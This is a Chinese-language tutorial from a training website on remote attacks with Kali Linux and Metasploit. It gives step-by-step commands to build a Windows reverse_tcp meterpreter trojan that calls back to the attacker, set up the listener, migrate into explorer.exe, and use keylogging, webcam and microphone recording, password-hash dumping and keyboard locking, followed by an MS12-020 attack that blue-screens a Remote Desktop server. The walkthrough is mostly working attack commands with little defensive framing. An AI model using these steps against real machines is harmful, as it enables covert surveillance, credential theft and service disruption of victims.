小标
2018-09-07
来源 :
阅读 3670
评论 0
摘要:本文主要向大家介绍了Linux运维知识之kali linux 远程攻击,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。
本文主要向大家介绍了Linux运维知识之kali linux 远程攻击,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。
1启动:msfconsole
exploit 漏洞利用工具
payloads ----àshellcode 漏洞利用后执行的代码
木马 控制 服务器
远程控制 木马程序
2.根据自己的ip生成一个木马
msfpayload windows/meterpreter/reverse_tcp LHOST=linux的ip LPORT=55555 X > test.exe
windows/meterpreter/reverse_tcp 目录
LHOST 本地的IP
LPORT 端口 (高端口容易过防火墙)
X 二进制 > 写 test.exe 二进制文件(木马程序)
主文件夹下
3.
use exploit/multi/handler
使用handler这个模块
4.使用show options 查看参数(发现无参数)
.
5.直接选下一个 set PAYLOAD windows/meterpreter/reverse_tcp
reverse_tcp 反向的链接(使用 shellcold 程序)
6.此时再次查看参数 show options
LHOST = 生成木马的linux IP 地址 (均要填写)
LPORT = 高端口 55555
7.填写生成木马的ip 以及端口
set LHOST linux IP
set LPORT 55555
生成完后,再次查看是否填写 show options
8.执行 exploit (等待链接状态)
等待点击木马
Metasploit(工具使用)
background 将会话放入后台
sessions -l 查看后台的会话
sessions -i 1 切换回刚才的会话
注入进程(防止木马被关闭)
ps 得到想要的PID进程
migrate PID 注入
(216 184 explorer.exe 桌面管理进程)
migrate 216 注入
(查看进程 PS)
例如 meterpreter> run vnc 开启远程桌面
文件管理功能 (file system commands)
download
edit (编辑文件) 后面直接加文件名
cat(查看文件)
mkdir (创建文件夹)
mv (移动文件)
rm (删除文件)
upload (上传)
rmdir (删除文件夹)
网络和系统操作 Networking commands
arp (查看arp缓存表)
getproxy (获取本机的代理)
ifconfig
ipconfig
netstat (查看本机的端口链接)
系统操作
kill 结束进程 (后面直接跟进程的PID号)
ps 查看进程
reboot 重启
reg 修改注册表
shell 获取终端
shutdown 关机
sysinfo 获取电脑信息
用户和其余操作 user interface commands
enumdesktops 用户登录数
keyscan_dump 键盘记录_下载
keyscan_start 键盘记录_开始
keyscan_stop 键盘记录_停止
uictl 获得键盘鼠标控制权
摄像头操作
record_mic 音频录制
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频录制
getsystem 获取高权限
hashdump 下载管理员的哈希密文
键盘记录的用法
1).先keyscan_start 开始记录
2). 再次 keyscan_dump 下载查看记录
3). Keyscan_stop 停止监听
键盘鼠标的锁定
uictl -h 查看参数
enable(打开) disable(锁定) keyboard(键盘) mouse(鼠标)
例:uictl disable keyboard 锁定键盘
注:键盘锁定时,win+E 任然可以用
音频录制:先查看参数在录制
Metasploit—(服务器蓝屏攻击)
条件:服务器必须开启 3389 端口( netstat –an 可进行查看)
目标:(DDOS 攻击)192.168.X.X
漏洞名称:MS12—020
1启动:msfconsole
2.输入 search ms12-020
解释:
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服务器远程桌面的模块
auxiliary/scanner/rdp/ms12_020_check
查看是否存在该漏洞
3. 检查 use auxiliary/scanner/rdp/ms12_020_check
(查看参数 show options)
RHOSTS 以R开头为远程主机
4.set RHOSTS 服务器的IP
5. 查看该端口是否存在 exploit
6.换模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
7.查看参数 show options
写入IP : set RHOST 服务器IP 再次查看是否设置成功
8.重新开一个终端,用ping (服务器) :正常应为ping通
(在网站的搜索栏,进入看是否能进入:输入服务器的IP)
9. 输入 exploit 攻击开始
结果:服务器蓝屏,无法ping 通
开启:3389:
//blog.csdn.net/bekilledlzy/article/details/1817637
Ms12-020解决措施
//cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm
注:
如果对方开启了防火墙或者修改了3389端口,可以通过下面方式查看:有一个 XXXX/tcp open realserver (可疑)
端口讲解
//vip.2cto.com/jc/241.html
本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注系统运维Linux频道!
喜欢 | 2
不喜欢 | 0
您输入的评论内容中包含违禁敏感词
我知道了

请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式AI+学习就业服务平台 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号